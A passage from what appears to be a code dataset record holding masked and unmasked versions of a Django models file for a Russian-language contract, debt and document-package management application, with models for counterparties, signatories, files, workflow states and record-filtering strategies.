False, то значение\n необходимо заполнить.\n debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.\n tax_count - Госпошлина. Можно заполнять в любом случае.\n package_users - Все пользователи пакета, работавшие с ним.\n package_state - Состояние пакета.\n package_state_date - Дата изменения состояния пакета.\n single_files - Пакет одиночных документов. \n pack_files - Пакет наборов файлов.\n other_files - Произвольные файлы.\n commentary - Комментарии.\n \"\"\"\n contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,\n related_name='contragents', related_query_name='contragent', null=\n True, blank=True)\n name_uuid = models.CharField('Идентификатор пакета', max_length=255,\n default=uuid.uuid4, null=True, blank=True, editable=False)\n is_active = models.BooleanField('Активный пакет', default=True)\n is_automatic = models.BooleanField('Создан автоматически', default=True)\n creation_date = models.DateField('Дата создания пакета', auto_now_add=True)\n debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)\n debt_fact = models.FloatField('Сумма задолжности (фактическая)',\n default=0.0)\n tax_count = models.FloatField('Госпошлина', default=0.0)\n package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,\n related_name='packages')\n package_state = models.ForeignKey('State', on_delete=models.CASCADE,\n null=True, blank=True)\n package_state_date = models.DateField('Дата последнего действия', null=\n True, blank=True)\n single_files = GenericRelation(SingleFile)\n pack_files = GenericRelation(PackFile)\n other_files = GenericRelation(OtherFile)\n commentary = GenericRelation(Commentary, related_query_name='package')\n act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,\n blank=True)\n\n def __str__(self):\n return f'Пакет {self.name_uuid}'\n\n def get_save_path(self):\n if self.contragent:\n return os.path.join(self.contragent.get_str_as_path(), str(self\n .name_uuid))\n else:\n return f'{self.name_uuid}'\n\n @classmethod\n def get_active_package(cls, contragent: Contragent):\n try:\n res = cls.objects.get(contragent__id=contragent.pk, is_active=True)\n return res\n except ObjectDoesNotExist:\n return None\n\n def initialize_sub_folders(self):\n os.makedirs(str(self.get_save_path()), exist_ok=True)\n\n def is_user_in_package(self, user, use_department=False):\n users = self.package_users.all()\n if use_department:\n depts = [tmp_user.department for tmp_user in users]\n return user.department in depts or user in users\n return user in users\n\n def set_inactive(self):\n self.is_active = False\n self.save()\n\n def change_state_to(self, new_state, is_backward):\n self.package_state = new_state\n self.package_state_date = datetime.date.today()\n if not is_backward:\n async_task(calc_create_gen_async, self.contragent, self, False,\n group=self.name_uuid)\n self.save()\n\n\n class Meta:\n verbose_name_plural = 'Пакеты документов'\n\n\nclass DocumentStateEntity(models.Model):\n documents = models.ManyToManyField('DocumentTypeModel', related_name=\n 'document_type')\n states = models.ForeignKey('State', related_name='states', on_delete=\n models.CASCADE, blank=True, null=True)\n template = models.ForeignKey('DocumentFileTemplate', on_delete=models.\n CASCADE, blank=True, null=True)\n\n\nclass DocumentFileTemplate(models.Model):\n contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n is_package = models.BooleanField('Набор файлов', default=False)\n\n def __str__(self):\n return KLASS_TYPES[self.contagent_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны файлов'\n\n\nclass NormativeCategory(models.Model):\n \"\"\" Класс Категории норматива \"\"\"\n name = models.CharField('Вид объекта', max_length=255)\n norm_type = models.IntegerField('Показатель расчета', default=0,\n choices=NORM_TYPE, blank=True, null=True)\n normative = models.ManyToManyField('Normative', related_name=\n 'normatives', verbose_name='Нормативы')\n\n def __str__(self):\n return self.name\n\n @property\n def print_norm_type(self):\n return NORM_TYPE[self.norm_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Категории нормативов'\n\n\nclass Normative(models.Model):\n \"\"\" Класс норматива \"\"\"\n since_date = models.DateField('Дата начала действия норматива', null=\n True, blank=True)\n up_to_date = models.DateField('Дата окончания действия норматива', null\n =True, blank=True)\n value = models.FloatField('Значение норматива (год.)', null=True, blank\n =True)\n\n def __str__(self):\n return (f'Норматив: {self.value}/год.,' +\n f\" действующий с {self.since_date.strftime('%d.%m.%Y')}\" +\n f\" по {self.up_to_date.strftime('%d.%m.%Y')}\")\n\n\n class Meta:\n verbose_name_plural = 'Нормативы'\n\n\nclass Contract(models.Model):\n \"\"\" Класс контракта. Нужен что бы получать уникальный номер контракта.\n Сохраняет дату когда был создан, для корректной генерации строкового\n представления.\n \"\"\"\n date_field = models.DateField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.pk:06}-{self.date_field.year}/ТКО/01'\n\n\n class Meta:\n verbose_name_plural = 'Сгенерированые номера договоров'\n\n\nclass ContractNumberClass(models.Model):\n \"\"\" Модель класса прокси для соединения класса документа и контрагента.\n\n Принимает на вход необязательные параметры:\n new - определяем, надо генерировать новый номер или есть\n старый. Булево значение. True = генерируем;\n exist_number - существующий номер договора. Строка;\n\n У класса есть такие поля как:\n is_generated - хранит булево значение. Определяет был ли сгенерирован\n номер или взят из внешних источников;\n contract_obj - объект модели самого номера контракта;\n contract_exist_number - существующий номер контракта. Пустая строка,\n если мы сгенерировали новый номер;\n contract_number - возвращает строковое представление номера, независимо\n от того, сгенерирован код или получен из внешнего\n источника.\n \"\"\"\n is_generated = models.BooleanField(default=False)\n contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,\n null=True, blank=True)\n contract_exist_number = models.CharField(default='', max_length=255,\n null=True, blank=True)\n\n @classmethod\n def create(cls, new: bool=False, exist_number: str=''):\n contract_num_obj = cls(is_generated=new)\n if new:\n contract_num_obj.contract_obj = Contract.objects.create()\n else:\n contract_num_obj.contract_exist_number = exist_number\n contract_num_obj.save()\n return contract_num_obj\n\n @property\n def contract_number(self):\n if self.is_generated:\n return str(self.contract_obj)\n else:\n return self.contract_exist_number\n\n def __str__(self):\n return self.contract_number\n\n\n class Meta:\n verbose_name_plural = 'Номера договоров'\n\n\nclass SyncUniqueNumber(models.Model):\n\n def __str__(self):\n return f'{self.pk:08}/01'\n\n\n class Meta:\n verbose_name_plural = 'Номера документов'\n\n\nclass CityModel(models.Model):\n name = models.CharField('Город', max_length=255, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name_plural = 'Города'\n\n\nclass TemplateModel(models.Model):\n template_path = models.CharField('Путь до шаблона', max_length=255)\n city = models.ForeignKey(CityModel, on_delete=models.CASCADE)\n contragent_type = models.IntegerField('Тип контрагента', choices=\n KLASS_TYPES, default=0)\n document_type = models.ForeignKey('DocumentTypeModel', verbose_name=\n 'Тип документа', on_delete=models.CASCADE)\n\n def __str__(self):\n return (\n f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'\n )\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны документов'\n\n\nclass DocumentTypeModel(models.Model):\n doc_type = models.CharField('Тип документа', max_length=255, null=True,\n blank=True)\n is_pack = models.BooleanField('Пакет документов', default=False)\n\n def __str__(self):\n return self.doc_type\n\n\n class Meta:\n verbose_name_plural = 'Типы документов'\n\n\nclass State(models.Model):\n name_state = models.CharField('Состояние', max_length=255)\n departments = models.ManyToManyField('yellowbird.Department',\n verbose_name='Отделы', related_name='available_states')\n is_initial_state = models.BooleanField('Начальное состояние', default=False\n )\n is_final_state = models.BooleanField('Конечное состояние', default=False)\n\n def get_linked_events(self):\n return Event.objects.filter(from_state=self.id)\n\n def _is_dept_permitted(self, department):\n return department in self.departments.all()\n\n def is_permitted(self, user):\n return user.is_superuser or user.is_staff or self._is_dept_permitted(\n user.department)\n\n def __str__(self):\n return self.name_state\n\n\n class Meta:\n verbose_name_plural = 'Состояния'\n\n\nclass Event(models.Model):\n name_event = models.CharField('Событие', max_length=255)\n from_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Исходное состояние', blank=True, null=True,\n related_name='begin_states')\n to_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Конечное состояние', blank=True, null=True,\n related_name='end_states')\n is_move_backward = models.BooleanField('Двигаемся обратно назад',\n default=False)\n\n def __str__(self):\n return self.name_event\n\n\n class Meta:\n verbose_name_plural = 'События'\n\n\nclass ListStrategy(ABC):\n\n @abstractmethod\n def execute_list_strategy(self, user):\n raise NotImplementedError\n\n @abstractmethod\n def execute_single_strategy(self, pk, user):\n raise NotImplementedError\n\n\nclass OnlyEmptyRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return [c for c in contragents if not c.active_package]\n\n def execute_single_strategy(self, pk, user):\n try:\n res = Contragent.objects.get(pk=pk)\n return res if not res.active_package else None\n except Contragent.DoesNotExist:\n return None\n\n\nclass OnlyMyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.filter(current_user__contain=user)\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk, current_user__contain=user)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllInDepartmentRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user.department):\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_list = [(c.department == user.department) for c in\n contragent.current_user]\n if any(tmp_list):\n return contragent\n return None\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\nclass MyAndEmptyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user) and user in c.current_user:\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user\n ) and user in contragent.current_user:\n return contragent\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SignUser(models.Model):\n name = models.CharField('ФИО отвественного лица', max_length=255)\n document = models.IntegerField('Документ основания', choices=DOC_TYPE,\n default=0)\n position = models.IntegerField('Должность', choices=POST_TYPE, default=0)\n doc_number = models.CharField('Номер документа', max_length=255)\n doc_date = models.DateField('Дата начала действия документа')\n address = models.CharField('Адресс', max_length=255)\n city = models.ForeignKey('CityModel', on_delete=models.CASCADE, blank=\n True, null=True)\n tel_number = models.CharField('Телефон', max_length=255, default='')\n sign = models.ImageField('Подпись', upload_to='signs/', blank=True,\n null=True)\n\n def __str__(self):\n return f'{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}'\n\n def save(self, *args, **kwargs):\n instance = SignUser.objects.get(id=self.id)\n if self.sign != instance.sign and instance.sign:\n if os.path.exists(instance.sign.url):\n os.remove(instance.sign.url)\n super().save(*args, **kwargs)\n\n\n class Meta:\n verbose_name_plural = 'Отвественные лица с правом подписи'\n\n\nclass Commentary(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.\n CASCADE, blank=True, null=True)\n commentary_text = models.TextField('Комментарий', blank=True, null=True)\n creation_date = models.DateTimeField('Дата создания', auto_now_add=True)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n\nclass AbstractFileModel(models.Model):\n file_name = models.CharField('Название файла', max_length=255, null=\n True, blank=True)\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n creation_date = models.DateField('Дата создания файла', blank=True,\n null=True)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n file_type = models.ForeignKey('DocumentTypeModel', on_delete=models.CASCADE\n )\n\n def delete(self, using=None, keep_parents=False):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n return super().delete(using=using, keep_parents=keep_parents)\n\n\n class Meta:\n abstract = True\n\n\nclass SingleFile(AbstractFileModel):\n\n def __str__(self):\n return str(self.file_type)\n\n\n class Meta:\n verbose_name_plural = 'Единичные файлы'\n\n\nclass PackFile(AbstractFileModel):\n unique_number = models.ForeignKey('SyncUniqueNumber', on_delete=models.\n CASCADE, null=True, blank=True)\n\n\n class Meta:\n abstract = False\n verbose_name_plural = 'Фаилы набора'\n\n def initialize_folder(self, path: str):\n if self.file_type:\n tmp_str_path = plur_form(self.file_type.doc_type)\n if not os.path.isdir(f'{path}/{tmp_str_path}/'):\n os.makedirs(f'{path}/{tmp_str_path}/')\n else:\n raise AttributeError()\n\n def get_files_path(self, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n self.initialize_folder(tmp_path)\n return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')\n\n\n<mask token>\n\n\nclass OtherFile(AbstractFileModel):\n file_obj = models.FileField('Произвольные файлы', upload_to=\n other_files_directory_path, max_length=500)\n commentary = GenericRelation(Commentary, related_query_name='file')\n\n\n class Meta:\n verbose_name_plural = 'Прочие файлы'\n\n\nclass ActExam(models.Model):\n FOLDER = 'Акт осмотра/'\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n file_name = models.CharField('Название файла', max_length=255, null=\n True, blank=True)\n\n @classmethod\n def initialize_folder(cls, path: str):\n tmp_path = f'{path}/{cls.FOLDER}'\n if not os.path.isdir(tmp_path):\n os.makedirs(tmp_path)\n\n @classmethod\n def get_files_path(cls, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n ActExam.initialize_folder(tmp_path)\n return os.path.join(tmp_path, cls.FOLDER)\n\n def clear_file(self):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n self.file_path = None\n self.file_name = None\n self.save()\n\n def delete(self, using=None, keep_parents=False):\n self.clear_file()\n return super().delete(using=using, keep_parents=keep_parents)\n\n\nclass DocumentsPackage(models.Model):\n \"\"\" Модель пакета документов.\n contragent - ID контрагента\n name_uuid - Уникальный ID пакета (каждый раз новый)\n is_active - Является ли пакет активным. Если True, то пакет в работе. Если\n False, то пакет закрыт.\n is_automatic - Создан ли пакет автоматически или пользователь может\n редактировать наборы файлов и некоторые характеристики. Если\n True, то нельзя подгружать свои договора и редактировать\n debt_plan. Если False, то редактирование возможно.\n creation_date - Дата создания пакета.\n debt_plan - Сумма долга. Если is_automatic == True, то значение не\n редактируется. Если is_automatic == False, то значение\n необходимо заполнить.\n debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.\n tax_count - Госпошлина. Можно заполнять в любом случае.\n package_users - Все пользователи пакета, работавшие с ним.\n package_state - Состояние пакета.\n package_state_date - Дата изменения состояния пакета.\n single_files - Пакет одиночных документов. \n pack_files - Пакет наборов файлов.\n other_files - Произвольные файлы.\n commentary - Комментарии.\n \"\"\"\n contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,\n related_name='contragents', related_query_name='contragent', null=\n True, blank=True)\n name_uuid = models.CharField('Идентификатор пакета', max_length=255,\n default=uuid.uuid4, null=True, blank=True, editable=False)\n is_active = models.BooleanField('Активный пакет', default=True)\n is_automatic = models.BooleanField('Создан автоматически', default=True)\n creation_date = models.DateField('Дата создания пакета', auto_now_add=True)\n debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)\n debt_fact = models.FloatField('Сумма задолжности (фактическая)',\n default=0.0)\n tax_count = models.FloatField('Госпошлина', default=0.0)\n package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,\n related_name='packages')\n package_state = models.ForeignKey('State', on_delete=models.CASCADE,\n null=True, blank=True)\n package_state_date = models.DateField('Дата последнего действия', null=\n True, blank=True)\n single_files = GenericRelation(SingleFile)\n pack_files = GenericRelation(PackFile)\n other_files = GenericRelation(OtherFile)\n commentary = GenericRelation(Commentary, related_query_name='package')\n act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,\n blank=True)\n\n def __str__(self):\n return f'Пакет {self.name_uuid}'\n\n def get_save_path(self):\n if self.contragent:\n return os.path.join(self.contragent.get_str_as_path(), str(self\n .name_uuid))\n else:\n return f'{self.name_uuid}'\n\n @classmethod\n def get_active_package(cls, contragent: Contragent):\n try:\n res = cls.objects.get(contragent__id=contragent.pk, is_active=True)\n return res\n except ObjectDoesNotExist:\n return None\n\n def initialize_sub_folders(self):\n os.makedirs(str(self.get_save_path()), exist_ok=True)\n\n def is_user_in_package(self, user, use_department=False):\n users = self.package_users.all()\n if use_department:\n depts = [tmp_user.department for tmp_user in users]\n return user.department in depts or user in users\n return user in users\n\n def set_inactive(self):\n self.is_active = False\n self.save()\n\n def change_state_to(self, new_state, is_backward):\n self.package_state = new_state\n self.package_state_date = datetime.date.today()\n if not is_backward:\n async_task(calc_create_gen_async, self.contragent, self, False,\n group=self.name_uuid)\n self.save()\n\n\n class Meta:\n verbose_name_plural = 'Пакеты документов'\n\n\nclass DocumentStateEntity(models.Model):\n documents = models.ManyToManyField('DocumentTypeModel', related_name=\n 'document_type')\n states = models.ForeignKey('State', related_name='states', on_delete=\n models.CASCADE, blank=True, null=True)\n template = models.ForeignKey('DocumentFileTemplate', on_delete=models.\n CASCADE, blank=True, null=True)\n\n\nclass DocumentFileTemplate(models.Model):\n contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n is_package = models.BooleanField('Набор файлов', default=False)\n\n def __str__(self):\n return KLASS_TYPES[self.contagent_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны файлов'\n\n\nclass NormativeCategory(models.Model):\n \"\"\" Класс Категории норматива \"\"\"\n name = models.CharField('Вид объекта', max_length=255)\n norm_type = models.IntegerField('Показатель расчета', default=0,\n choices=NORM_TYPE, blank=True, null=True)\n normative = models.ManyToManyField('Normative', related_name=\n 'normatives', verbose_name='Нормативы')\n\n def __str__(self):\n return self.name\n\n @property\n def print_norm_type(self):\n return NORM_TYPE[self.norm_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Категории нормативов'\n\n\nclass Normative(models.Model):\n \"\"\" Класс норматива \"\"\"\n since_date = models.DateField('Дата начала действия норматива', null=\n True, blank=True)\n up_to_date = models.DateField('Дата окончания действия норматива', null\n =True, blank=True)\n value = models.FloatField('Значение норматива (год.)', null=True, blank\n =True)\n\n def __str__(self):\n return (f'Норматив: {self.value}/год.,' +\n f\" действующий с {self.since_date.strftime('%d.%m.%Y')}\" +\n f\" по {self.up_to_date.strftime('%d.%m.%Y')}\")\n\n\n class Meta:\n verbose_name_plural = 'Нормативы'\n\n\nclass Contract(models.Model):\n \"\"\" Класс контракта. Нужен что бы получать уникальный номер контракта.\n Сохраняет дату когда был создан, для корректной генерации строкового\n представления.\n \"\"\"\n date_field = models.DateField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.pk:06}-{self.date_field.year}/ТКО/01'\n\n\n class Meta:\n verbose_name_plural = 'Сгенерированые номера договоров'\n\n\nclass ContractNumberClass(models.Model):\n \"\"\" Модель класса прокси для соединения класса документа и контрагента.\n\n Принимает на вход необязательные параметры:\n new - определяем, надо генерировать новый номер или есть\n старый. Булево значение. True = генерируем;\n exist_number - существующий номер договора. Строка;\n\n У класса есть такие поля как:\n is_generated - хранит булево значение. Определяет был ли сгенерирован\n номер или взят из внешних источников;\n contract_obj - объект модели самого номера контракта;\n contract_exist_number - существующий номер контракта. Пустая строка,\n если мы сгенерировали новый номер;\n contract_number - возвращает строковое представление номера, независимо\n от того, сгенерирован код или получен из внешнего\n источника.\n \"\"\"\n is_generated = models.BooleanField(default=False)\n contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,\n null=True, blank=True)\n contract_exist_number = models.CharField(default='', max_length=255,\n null=True, blank=True)\n\n @classmethod\n def create(cls, new: bool=False, exist_number: str=''):\n contract_num_obj = cls(is_generated=new)\n if new:\n contract_num_obj.contract_obj = Contract.objects.create()\n else:\n contract_num_obj.contract_exist_number = exist_number\n contract_num_obj.save()\n return contract_num_obj\n\n @property\n def contract_number(self):\n if self.is_generated:\n return str(self.contract_obj)\n else:\n return self.contract_exist_number\n\n def __str__(self):\n return self.contract_number\n\n\n class Meta:\n verbose_name_plural = 'Номера договоров'\n\n\nclass SyncUniqueNumber(models.Model):\n\n def __str__(self):\n return f'{self.pk:08}/01'\n\n\n class Meta:\n verbose_name_plural = 'Номера документов'\n\n\nclass CityModel(models.Model):\n name = models.CharField('Город', max_length=255, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name_plural = 'Города'\n\n\nclass TemplateModel(models.Model):\n template_path = models.CharField('Путь до шаблона', max_length=255)\n city = models.ForeignKey(CityModel, on_delete=models.CASCADE)\n contragent_type = models.IntegerField('Тип контрагента', choices=\n KLASS_TYPES, default=0)\n document_type = models.ForeignKey('DocumentTypeModel', verbose_name=\n 'Тип документа', on_delete=models.CASCADE)\n\n def __str__(self):\n return (\n f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'\n )\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны документов'\n\n\nclass DocumentTypeModel(models.Model):\n doc_type = models.CharField('Тип документа', max_length=255, null=True,\n blank=True)\n is_pack = models.BooleanField('Пакет документов', default=False)\n\n def __str__(self):\n return self.doc_type\n\n\n class Meta:\n verbose_name_plural = 'Типы документов'\n\n\nclass State(models.Model):\n name_state = models.CharField('Состояние', max_length=255)\n departments = models.ManyToManyField('yellowbird.Department',\n verbose_name='Отделы', related_name='available_states')\n is_initial_state = models.BooleanField('Начальное состояние', default=False\n )\n is_final_state = models.BooleanField('Конечное состояние', default=False)\n\n def get_linked_events(self):\n return Event.objects.filter(from_state=self.id)\n\n def _is_dept_permitted(self, department):\n return department in self.departments.all()\n\n def is_permitted(self, user):\n return user.is_superuser or user.is_staff or self._is_dept_permitted(\n user.department)\n\n def __str__(self):\n return self.name_state\n\n\n class Meta:\n verbose_name_plural = 'Состояния'\n\n\nclass Event(models.Model):\n name_event = models.CharField('Событие', max_length=255)\n from_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Исходное состояние', blank=True, null=True,\n related_name='begin_states')\n to_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Конечное состояние', blank=True, null=True,\n related_name='end_states')\n is_move_backward = models.BooleanField('Двигаемся обратно назад',\n default=False)\n\n def __str__(self):\n return self.name_event\n\n\n class Meta:\n verbose_name_plural = 'События'\n\n\nclass ListStrategy(ABC):\n\n @abstractmethod\n def execute_list_strategy(self, user):\n raise NotImplementedError\n\n @abstractmethod\n def execute_single_strategy(self, pk, user):\n raise NotImplementedError\n\n\nclass OnlyEmptyRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return [c for c in contragents if not c.active_package]\n\n def execute_single_strategy(self, pk, user):\n try:\n res = Contragent.objects.get(pk=pk)\n return res if not res.active_package else None\n except Contragent.DoesNotExist:\n return None\n\n\nclass OnlyMyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.filter(current_user__contain=user)\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk, current_user__contain=user)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllInDepartmentRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user.department):\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_list = [(c.department == user.department) for c in\n contragent.current_user]\n if any(tmp_list):\n return contragent\n return None\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\nclass MyAndEmptyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user) and user in c.current_user:\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user\n ) and user in contragent.current_user:\n return contragent\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Contragent(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def check_and_create_parent_folder(self):\n if not os.path.isdir(os.path.join(settings.MEDIA_ROOT, KLASS_TYPES[\n self.klass][1])):\n os.mkdir(os.path.join(settings.MEDIA_ROOT, KLASS_TYPES[self.\n klass][1]), mode=511)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_active_package(self):\n res = DocumentsPackage.get_active_package(self)\n return res\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name_plural = 'Контрагенты'\n\n\nclass SignUser(models.Model):\n name = models.CharField('ФИО отвественного лица', max_length=255)\n document = models.IntegerField('Документ основания', choices=DOC_TYPE,\n default=0)\n position = models.IntegerField('Должность', choices=POST_TYPE, default=0)\n doc_number = models.CharField('Номер документа', max_length=255)\n doc_date = models.DateField('Дата начала действия документа')\n address = models.CharField('Адресс', max_length=255)\n city = models.ForeignKey('CityModel', on_delete=models.CASCADE, blank=\n True, null=True)\n tel_number = models.CharField('Телефон', max_length=255, default='')\n sign = models.ImageField('Подпись', upload_to='signs/', blank=True,\n null=True)\n\n def __str__(self):\n return f'{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}'\n\n def save(self, *args, **kwargs):\n instance = SignUser.objects.get(id=self.id)\n if self.sign != instance.sign and instance.sign:\n if os.path.exists(instance.sign.url):\n os.remove(instance.sign.url)\n super().save(*args, **kwargs)\n\n\n class Meta:\n verbose_name_plural = 'Отвественные лица с правом подписи'\n\n\nclass Commentary(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.\n CASCADE, blank=True, null=True)\n commentary_text = models.TextField('Комментарий', blank=True, null=True)\n creation_date = models.DateTimeField('Дата создания', auto_now_add=True)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n\nclass AbstractFileModel(models.Model):\n file_name = models.CharField('Название файла', max_length=255, null=\n True, blank=True)\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n creation_date = models.DateField('Дата создания файла', blank=True,\n null=True)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n file_type = models.ForeignKey('DocumentTypeModel', on_delete=models.CASCADE\n )\n\n def delete(self, using=None, keep_parents=False):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n return super().delete(using=using, keep_parents=keep_parents)\n\n\n class Meta:\n abstract = True\n\n\nclass SingleFile(AbstractFileModel):\n\n def __str__(self):\n return str(self.file_type)\n\n\n class Meta:\n verbose_name_plural = 'Единичные файлы'\n\n\nclass PackFile(AbstractFileModel):\n unique_number = models.ForeignKey('SyncUniqueNumber', on_delete=models.\n CASCADE, null=True, blank=True)\n\n\n class Meta:\n abstract = False\n verbose_name_plural = 'Фаилы набора'\n\n def initialize_folder(self, path: str):\n if self.file_type:\n tmp_str_path = plur_form(self.file_type.doc_type)\n if not os.path.isdir(f'{path}/{tmp_str_path}/'):\n os.makedirs(f'{path}/{tmp_str_path}/')\n else:\n raise AttributeError()\n\n def get_files_path(self, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n self.initialize_folder(tmp_path)\n return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')\n\n\n<mask token>\n\n\nclass OtherFile(AbstractFileModel):\n file_obj = models.FileField('Произвольные файлы', upload_to=\n other_files_directory_path, max_length=500)\n commentary = GenericRelation(Commentary, related_query_name='file')\n\n\n class Meta:\n verbose_name_plural = 'Прочие файлы'\n\n\nclass ActExam(models.Model):\n FOLDER = 'Акт осмотра/'\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n file_name = models.CharField('Название 